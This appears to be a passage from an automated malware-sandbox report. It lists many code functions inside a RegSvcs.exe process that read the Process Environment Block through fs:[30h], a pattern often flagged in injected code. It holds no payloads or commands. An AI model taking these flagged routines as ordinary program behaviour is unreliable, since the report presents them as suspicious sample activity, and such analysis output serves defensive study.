            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DA250 mov eax, dword ptr fs:[00000030h]15_2_013DA250
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B62D6 mov eax, dword ptr fs:[00000030h]15_2_014B62D6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01460283 mov eax, dword ptr fs:[00000030h]15_2_01460283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01460283 mov eax, dword ptr fs:[00000030h]15_2_01460283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01460283 mov eax, dword ptr fs:[00000030h]15_2_01460283
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141E284 mov eax, dword ptr fs:[00000030h]15_2_0141E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141E284 mov eax, dword ptr fs:[00000030h]15_2_0141E284
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F02E1 mov eax, dword ptr fs:[00000030h]15_2_013F02E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F02E1 mov eax, dword ptr fs:[00000030h]15_2_013F02E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F02E1 mov eax, dword ptr fs:[00000030h]15_2_013F02E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014762A0 mov eax, dword ptr fs:[00000030h]15_2_014762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014762A0 mov ecx, dword ptr fs:[00000030h]15_2_014762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014762A0 mov eax, dword ptr fs:[00000030h]15_2_014762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014762A0 mov eax, dword ptr fs:[00000030h]15_2_014762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014762A0 mov eax, dword ptr fs:[00000030h]15_2_014762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014762A0 mov eax, dword ptr fs:[00000030h]15_2_014762A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA2C3 mov eax, dword ptr fs:[00000030h]15_2_013EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA2C3 mov eax, dword ptr fs:[00000030h]15_2_013EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA2C3 mov eax, dword ptr fs:[00000030h]15_2_013EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA2C3 mov eax, dword ptr fs:[00000030h]15_2_013EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EA2C3 mov eax, dword ptr fs:[00000030h]15_2_013EA2C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0535 mov eax, dword ptr fs:[00000030h]15_2_013F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0535 mov eax, dword ptr fs:[00000030h]15_2_013F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0535 mov eax, dword ptr fs:[00000030h]15_2_013F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0535 mov eax, dword ptr fs:[00000030h]15_2_013F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0535 mov eax, dword ptr fs:[00000030h]15_2_013F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0535 mov eax, dword ptr fs:[00000030h]15_2_013F0535
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141656A mov eax, dword ptr fs:[00000030h]15_2_0141656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141656A mov eax, dword ptr fs:[00000030h]15_2_0141656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141656A mov eax, dword ptr fs:[00000030h]15_2_0141656A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01476500 mov eax, dword ptr fs:[00000030h]15_2_01476500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B4500 mov eax, dword ptr fs:[00000030h]15_2_014B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B4500 mov eax, dword ptr fs:[00000030h]15_2_014B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B4500 mov eax, dword ptr fs:[00000030h]15_2_014B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B4500 mov eax, dword ptr fs:[00000030h]15_2_014B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B4500 mov eax, dword ptr fs:[00000030h]15_2_014B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B4500 mov eax, dword ptr fs:[00000030h]15_2_014B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B4500 mov eax, dword ptr fs:[00000030h]15_2_014B4500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E8550 mov eax, dword ptr fs:[00000030h]15_2_013E8550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E8550 mov eax, dword ptr fs:[00000030h]15_2_013E8550
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140E53E mov eax, dword ptr fs:[00000030h]15_2_0140E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140E53E mov eax, dword ptr fs:[00000030h]15_2_0140E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140E53E mov eax, dword ptr fs:[00000030h]15_2_0140E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140E53E mov eax, dword ptr fs:[00000030h]15_2_0140E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140E53E mov eax, dword ptr fs:[00000030h]15_2_0140E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141E5CF mov eax, dword ptr fs:[00000030h]15_2_0141E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141E5CF mov eax, dword ptr fs:[00000030h]15_2_0141E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141A5D0 mov eax, dword ptr fs:[00000030h]15_2_0141A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141A5D0 mov eax, dword ptr fs:[00000030h]15_2_0141A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140E5E7 mov eax, dword ptr fs:[00000030h]15_2_0140E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141C5ED mov eax, dword ptr fs:[00000030h]15_2_0141C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141C5ED mov eax, dword ptr fs:[00000030h]15_2_0141C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E2582 mov eax, dword ptr fs:[00000030h]15_2_013E2582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E2582 mov ecx, dword ptr fs:[00000030h]15_2_013E2582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01414588 mov eax, dword ptr fs:[00000030h]15_2_01414588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141E59C mov eax, dword ptr fs:[00000030h]15_2_0141E59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E25E0 mov eax, dword ptr fs:[00000030h]15_2_013E25E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014605A7 mov eax, dword ptr fs:[00000030h]15_2_014605A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014605A7 mov eax, dword ptr fs:[00000030h]15_2_014605A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014605A7 mov eax, dword ptr fs:[00000030h]15_2_014605A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E65D0 mov eax, dword ptr fs:[00000030h]15_2_013E65D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014045B1 mov eax, dword ptr fs:[00000030h]15_2_014045B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014045B1 mov eax, dword ptr fs:[00000030h]15_2_014045B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141E443 mov eax, dword ptr fs:[00000030h]15_2_0141E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140245A mov eax, dword ptr fs:[00000030h]15_2_0140245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DC427 mov eax, dword ptr fs:[00000030h]15_2_013DC427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DE420 mov eax, dword ptr fs:[00000030h]15_2_013DE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DE420 mov eax, dword ptr fs:[00000030h]15_2_013DE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013DE420 mov eax, dword ptr fs:[00000030h]15_2_013DE420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0149A456 mov eax, dword ptr fs:[00000030h]15_2_0149A456
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146C460 mov ecx, dword ptr fs:[00000030h]15_2_0146C460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140A470 mov eax, dword ptr fs:[00000030h]15_2_0140A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140A470 mov eax, dword ptr fs:[00000030h]15_2_0140A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0140A470 mov eax, dword ptr fs:[00000030h]15_2_0140A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01418402 mov eax, dword ptr fs:[00000030h]15_2_01418402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01418402 mov eax, dword ptr fs:[00000030h]15_2_01418402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01418402 mov eax, dword ptr fs:[00000030h]15_2_01418402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013D645D mov eax, dword ptr fs:[00000030h]15_2_013D645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01466420 mov eax, dword ptr fs:[00000030h]15_2_01466420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01466420 mov eax, dword ptr fs:[00000030h]15_2_01466420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01466420 mov eax, dword ptr fs:[00000030h]15_2_01466420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01466420 mov eax, dword ptr fs:[00000030h]15_2_01466420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01466420 mov eax, dword ptr fs:[00000030h]15_2_01466420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01466420 mov eax, dword ptr fs:[00000030h]15_2_01466420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01466420 mov eax, dword ptr fs:[00000030h]15_2_01466420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141A430 mov eax, dword ptr fs:[00000030h]15_2_0141A430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E64AB mov eax, dword ptr fs:[00000030h]15_2_013E64AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0149A49A mov eax, dword ptr fs:[00000030h]15_2_0149A49A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E04E5 mov ecx, dword ptr fs:[00000030h]15_2_013E04E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014144B0 mov ecx, dword ptr fs:[00000030h]15_2_014144B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146A4B0 mov eax, dword ptr fs:[00000030h]15_2_0146A4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141674D mov esi, dword ptr fs:[00000030h]15_2_0141674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141674D mov eax, dword ptr fs:[00000030h]15_2_0141674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141674D mov eax, dword ptr fs:[00000030h]15_2_0141674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422750 mov eax, dword ptr fs:[00000030h]15_2_01422750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422750 mov eax, dword ptr fs:[00000030h]15_2_01422750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01464755 mov eax, dword ptr fs:[00000030h]15_2_01464755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146E75D mov eax, dword ptr fs:[00000030h]15_2_0146E75D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E0710 mov eax, dword ptr fs:[00000030h]15_2_013E0710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141C700 mov eax, dword ptr fs:[00000030h]15_2_0141C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E8770 mov eax, dword ptr fs:[00000030h]15_2_013E8770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F0770 mov eax, dword ptr fs:[00000030h]15_2_013F0770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01410710 mov eax, dword ptr fs:[00000030h]15_2_01410710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141C720 mov eax, dword ptr fs:[00000030h]15_2_0141C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141C720 mov eax, dword ptr fs:[00000030h]15_2_0141C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E0750 mov eax, dword ptr fs:[00000030h]15_2_013E0750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145C730 mov eax, dword ptr fs:[00000030h]15_2_0145C730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141273C mov eax, dword ptr fs:[00000030h]15_2_0141273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141273C mov ecx, dword ptr fs:[00000030h]15_2_0141273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141273C mov eax, dword ptr fs:[00000030h]15_2_0141273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014607C3 mov eax, dword ptr fs:[00000030h]15_2_014607C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E07AF mov eax, dword ptr fs:[00000030h]15_2_013E07AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0146E7E1 mov eax, dword ptr fs:[00000030h]15_2_0146E7E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014027ED mov eax, dword ptr fs:[00000030h]15_2_014027ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014027ED mov eax, dword ptr fs:[00000030h]15_2_014027ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014027ED mov eax, dword ptr fs:[00000030h]15_2_014027ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E47FB mov eax, dword ptr fs:[00000030h]15_2_013E47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E47FB mov eax, dword ptr fs:[00000030h]15_2_013E47FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0148678E mov eax, dword ptr fs:[00000030h]15_2_0148678E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014947A0 mov eax, dword ptr fs:[00000030h]15_2_014947A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013EC7C0 mov eax, dword ptr fs:[00000030h]15_2_013EC7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E262C mov eax, dword ptr fs:[00000030h]15_2_013E262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FE627 mov eax, dword ptr fs:[00000030h]15_2_013FE627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141A660 mov eax, dword ptr fs:[00000030h]15_2_0141A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141A660 mov eax, dword ptr fs:[00000030h]15_2_0141A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A866E mov eax, dword ptr fs:[00000030h]15_2_014A866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014A866E mov eax, dword ptr fs:[00000030h]15_2_014A866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F260B mov eax, dword ptr fs:[00000030h]15_2_013F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F260B mov eax, dword ptr fs:[00000030h]15_2_013F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F260B mov eax, dword ptr fs:[00000030h]15_2_013F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F260B mov eax, dword ptr fs:[00000030h]15_2_013F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F260B mov eax, dword ptr fs:[00000030h]15_2_013F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F260B mov eax, dword ptr fs:[00000030h]15_2_013F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013F260B mov eax, dword ptr fs:[00000030h]15_2_013F260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01412674 mov eax, dword ptr fs:[00000030h]15_2_01412674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E609 mov eax, dword ptr fs:[00000030h]15_2_0145E609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01422619 mov eax, dword ptr fs:[00000030h]15_2_01422619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01416620 mov eax, dword ptr fs:[00000030h]15_2_01416620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01418620 mov eax, dword ptr fs:[00000030h]15_2_01418620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013FC640 mov eax, dword ptr fs:[00000030h]15_2_013FC640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141A6C7 mov ebx, dword ptr fs:[00000030h]15_2_0141A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141A6C7 mov eax, dword ptr fs:[00000030h]15_2_0141A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E4690 mov eax, dword ptr fs:[00000030h]15_2_013E4690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_013E4690 mov eax, dword ptr fs:[00000030h]15_2_013E4690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E6F2 mov eax, dword ptr fs:[00000030h]15_2_0145E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E6F2 mov eax, dword ptr fs:[00000030h]15_2_0145E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E6F2 mov eax, dword ptr fs:[00000030h]15_2_0145E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0145E6F2 mov eax, dword ptr fs:[00000030h]15_2_0145E6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014606F1 mov eax, dword ptr fs:[00000030h]15_2_014606F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014606F1 mov eax, dword ptr fs:[00000030h]15_2_014606F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_0141C6A6 mov eax, dword ptr fs:[00000030h]15_2_0141C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014166B0 mov eax, dword ptr fs:[00000030h]15_2_014166B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_01460946 mov eax, dword ptr fs:[00000030h]15_2_01460946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_014B4940 mov eax, dword ptr fs:[00000030h]15_2_014B4940
